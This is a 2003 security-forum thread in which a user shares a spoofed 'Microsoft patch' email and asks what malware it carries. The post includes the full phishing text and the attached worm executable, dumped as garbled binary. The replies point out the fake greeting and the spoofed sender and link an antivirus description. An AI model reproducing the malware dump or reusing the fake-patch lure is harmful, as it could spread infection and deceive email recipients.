Another virus / trojan? haha!
Results 1 to 4 of 4

Thread: Another virus / trojan? haha!

  1. #1
    Forgotten Ghost RogueSpy's Avatar
    Join Date
    Aug 2001
    Location
    Cyberspace
    Posts
    783

    Another virus / trojan? haha!

    Someone must not like me. . . and they think im stupid. Got another one of these funny e-mails. lol This one says its from Microsoft. Interesting return path. Damn script kiddies.


    Status: U
    Return-Path: <admin@duma.gov.ru>
    Received: from localhost ([216.12.50.133])
    by swallow (EarthLink SMTP Server) with SMTP id 1ajx5F3a33NZFkN0
    for <roguespy>; Tue, 11 Nov 2003 03:53:47 -0800 (PST)
    From: "Microsoft" <security@microsoft.com>
    To: <roguespy>
    Subject: Use this patch immediately !
    MIME-Version: 1.0
    Content-Type: multipart/mixed;boundary="xxxx"
    Message-Id: <200311110353.1ajx5F3a33NZFkN0@swallow>
    Date: Tue, 11 Nov 2003 03:53:47 -0800 (PST)

    --xxxx
    Content-Type: text/plain;
    Content-Transfer-Encoding: 7bit

    Dear friend , use this Internet Explorer patch now!
    There are dangerous virus in the Internet now!
    More than 500.000 already infected!

    --xxxx
    Content-Type: application/download
    Content-Transfer-Encoding: base64
    Content-Disposition: attachment; filename=patch.exe

    MZP    @     !L!This program must be run under Win32
    $7 PE L ,;   p @ * @    
          *  UPX0 p   UPX1   @ UPX2  *  " @ 1.08 UPX!  }Ct 6 P & l ,j SQ
    D$PSjSPZ[Ðh Ç'9JU_QSVWrEuURWV
    _^[Y] X@3*#z;Pj@ }WoەgVu Yÿ
    9f$P
    .m/_WDf
    TRn-@6a}{ǁDtdPh헯'kt3
    /2u
    Nv3 jh
    hKnHMQh q?a+ <2`te`x\@s2}>\\\`EEDžHMo@ Lh2RMQgc%
    h=.}@Q8Pf]cTAR X\H3ǍA
    R
    8᳎W^PV\)&Q){7[ H
    Ok@ ]4u),FI5GRX'UF]GS`n ba * `Vh@-o<.u@tFF"iphlpapi.dllo&;<GetNworFkParamsh"p:sQ ﯀> u@x199.166.2
    ]Af,T5?a21Pσ݄?hF*v9`U
    h.L]cE @h}v { @ 6oAWI|a`d 76 Prt>Y =Wa=a!o9Ț'}FGaɀ)uFt.G
    n2 a Fa`!N}  ]l45G(G5ҕ
    @eܮPFb
    fi!edC?69]Y7 9lnwmft
    wa E 0l}PR37؂ !M yG2ɋU . t
    Fw-fג0 &GF7W`hjzW]`fE&-w/EhCnmm3@ @3h%p
    u~("[Bl(`r0K<Lx'3Q S2B:V;$t F;qr
    hQ$"rA1\aXXՋd$]dg6& HXSs t o;u rv| +  #.\$VXa 3D += a|dg8X*f3ہû f=۳g`- P5.>54P"ہ 
    esPTs7ݓ w1~.<$!߀L+ ] < .=+[]Yr;L;mbD
    w @g\'L
    }ABCDEFGHIJKLMNOPQRSTUXYZabcdefghijklmnopqrstuvwxyz0123456789+/_U3?<<2Ff]f @0W2c=jEv W2
    m

    9 \u;[8;+t9v,>US]نY4PR- Q
    5ezhLR8B j]T3)]M
    ~&  D_4J] J?~&UѯlKa nc; f 7haN.N4$3F
    o
    47s3A<-t<<0<9v<Ar'<`v<[r<\tw^rzvă ;v߁rp+0*ڶ dtekNAl{S;!v$pr>4]tl6fb.*? *a"@+Fd{gmf2{INlNt*yv4n܁D@

    }%L+,0i*
    LC*u]I~0%Iu;bM
    j@_*1z;sEtn8&,<[
    Q2,D<-o!
    loxQ( (|`Z Ä
    '^{VQ-r
    Hw {^æ*rpGC; :e *&F/;3odUAyuPJac#/;~62
    umoC@3D.,3۱Ur7gžz;#eRU7[O1C</[זG>MK+d Ht7Rl;6X<6>u ڿCS\D鑥pV hOndRvwh\R~g*R sL" D)X#l8C3_-UX|m@k
    7W'ܽVxtX6orM,P gA|*XZu`nsfO$7юiM.WW"Q?
    (R'1sa7PRw;Zx5 ЍG'vYk~(?ʍW(QPRXa]Y06(SYS%pt\2O, ,"V4YtGjnY.k!-d@hk_eYW>aRYׅY'\- 1WWcke5X{/t(M4٥\ iSjϘ[1Rr`gbL$4m
    uoNs͋֋ӎێxg~$
    hd@0#%捌$ 4<3٣0:si,x0\A-p2Ec/,Up WmDXG~E45=Y{ouMjzf3_m@<D($P 'he?:l=s's5[Plh@  ^ Tx>h];[ =3'A4PQ4R,e;=nM4S;)T
    4cFtΘq7 !lad7,,k >&7Isp(@IUy cRS" Pޓ7R3Bh@=QѾugd $mf;V<N9v4Hy!9r VzH
    ]0븷{J,1Hu <m̨&Y6`Z=b Iw"PJ)PޱZ)3i4F@ f*-+ D#u$s V_@i3_ff1k6ۯG.ڷMtQ6a k*lXsa Kvj"eThO*?Rhv ѩ][^ZEl >݋ $*egPvSL"mXd Q9`HX^!lz8a¢E?*mgޓa7
    ‘0U0*\_%{K^#%zOu#,1f`g%.$6ۡW>$\ Gb7.t&#[ %PaTX####\`dh####lptx####|########*####################FF#b FFFF FFFF$(,4=Tf MZPuO EJ  !Lis* prog mustMe ruvn der Win3$7G PEL .P  
    06a  v8 (`L
    6v83 Arl*@,BCODEw #DAa_lTA  '+Qn.iD.K@'reAlocP$' ( `3
    3d2d"iS ZaLcDyh$[4"@l K}@ #!MfٺQL.@-OݽHh5 &c H*Ͼn<ɫjnY'{r3+ O΁>PINGuFOV<
    u+^6rrdd nV4~F#rVzF_RtQ@tNC@7 -RIVMSG #& :!@.ady
    s;^X8Hݱ#bxVNm͖%/Xۿtx+́r u4|tnF u~uj Yʋץ^A<!wuO -:w~X:jX`<*-4<auHowzVߜQ`Zj%tafy.
    f
    T0."a=>**&xm*O3@plȀog6 _ó8Y
    =>kλӣO3Am 9PhPA5IQq Gǿ7Rh!$_XIP dss: ^Woa"jdh\WY52Y Pp *0
    96V`m_/kȏ{1|
    Vk'*~Qq&.a_F'^Y_ÿ7L8oB (A8dRjY\
    3I/Z3۬2ֶ͊fs f5 fu33OuF[fZYV60|<9wA^J`~k
    I0`e]`x ڕe`#'~t4/*Unhlh$&^̏G Aew= a@đԑ䑑U *PNpa~߉dos stopwhois6 7 [t+egold-&ing.comUSER w8`5UNICK JO>H4L911l"VBMD!+kGs 
    k }5M@= 5v"
    f<@Y^A*`j_,i:HT\hxA5g#Wii4˦B Bc7 KWNEL32YWSOX ExitProce
    Th8CseHan*enc_jlrcpySepnlenC6te=HhJTickCoun\nGnnec
    cWsskec
    bi`Sacc)l?iVT g!bynKamAStaup[v*8_\oa^hts!Ͷ6n!dvncvvk|ٰa_ (070N0S0`00000171J1x00o123!2C2J2Q2x222
    3P3l333333344&444
    55?5E5K5Q5W5]5c5i5o5u5{5555555555555c333333 (HELO -0alMAIL FROM: <admin@duma.gov.ru>x RCPT TO  wQUITFrom"Micsoft"(security@m15=ToFS5ubj
    U+ t/Catch immedi7ly !&MIME-Version+1.0*C -Type:m qltip/jx9;b*]dy="x ".Fv*-- 9
    x4l{pla;ransfoֈ-End'7bȗ*~FDeV f1 ,/Aw uI8rw ExvnLor nowTh(aL k*1vir[?e>9w/MA+ 500ݣ ;l(/f /!amC+po}+/dNۉn8ba6h4"Dp*nElGtam;ilXe=.9eۖEX.\wit{.g \*.* .htmwab 6syldbxtbd#2C:B B\. ^ܛ :STR]C /*F jƓDLLegB\hArS|cet|
    \["ESwd4\\Es\Cr68\R` 8@3g@w- m .ivxP/be Zh*otAެym1F"
    U V`LPQo
     mpGlobalAllen
    etSDir*1 or5FP@5 Dele;*
    eIoVrol8 SFf%hN{,[TXH op
    Nameֺ Fmm
    L7/Drive参ttribusSiz@-k?Moduae*A
    {tdB!r*%oCZ=dPno%rsKSGQ
    ]]RR1Sفŀw+S*[PoiJ
    iv58*sofc
    PLݡ3f3Xng&_lwpcw/4[0.AK%`OpKeysAsb. f[Vue44Rt`Ann͵#vCtc6pc
    ;!cN 7XK+1YF&,;,B. 0+/` p  8r`$Ȉ`KHN.2"pNHP<b 4  ` @ WFGur usu s1Ƀr
    Fttuuu Ausu s /vBGIucwL^7 G,<w? u_f)ٍ p  t<_0 Pd Gt܉WHUh tl als * d* * t* * |* * * * * * * *  KERNEL32.DLL ADVAPI32.dll wininet.dll WSOCK32.dll LoadLibraryA GetProcAddress ExitProcess RegCloseKey InternetGetConnectedState send z (l 4l <  Xl
    "Never give in-never, never, never, in nothing great or small, large or petty, never give in to convictions of honor and good sense. Never yield to force; never yield to the apparently overwhelming might of the enemy!" - Winston Churchill

  2. #2
    Antionline Quitter..Srsly
    Join Date
    Aug 2001
    Posts
    457
    LOL...who seriously thinks microsoft would start a legit email with "dear friend" :P~
    \"\"A weak mind is like a microscope, which magnifies trifling things but cannot receive great ones.\" G.K. Chesterton, 19th-century English essayist and poet\"

  3. #3
    Forgotten Ghost RogueSpy's Avatar
    Join Date
    Aug 2001
    Location
    Cyberspace
    Posts
    783
    Skript Kiddies my friend. . . . Retarded script kiddies.

    Any idea what this one is? This is becoming a habit. . . . maybe I need a forum called "Name that Virus/Trojan" lol
    "Never give in-never, never, never, in nothing great or small, large or petty, never give in to convictions of honor and good sense. Never yield to force; never yield to the apparently overwhelming might of the enemy!" - Winston Churchill

  4. #4
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Rogue, http://support-antivirus.web.cern.ch..._6/virus_6.asp .

    Generally, the body of the email will give it away. If I'm suspicious, I just plop a line or two into Google and see what pops up. It looks more like automated worm activity than a deliberate target. I expect that the address is spoofed (email addy doesn't match source addy).
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •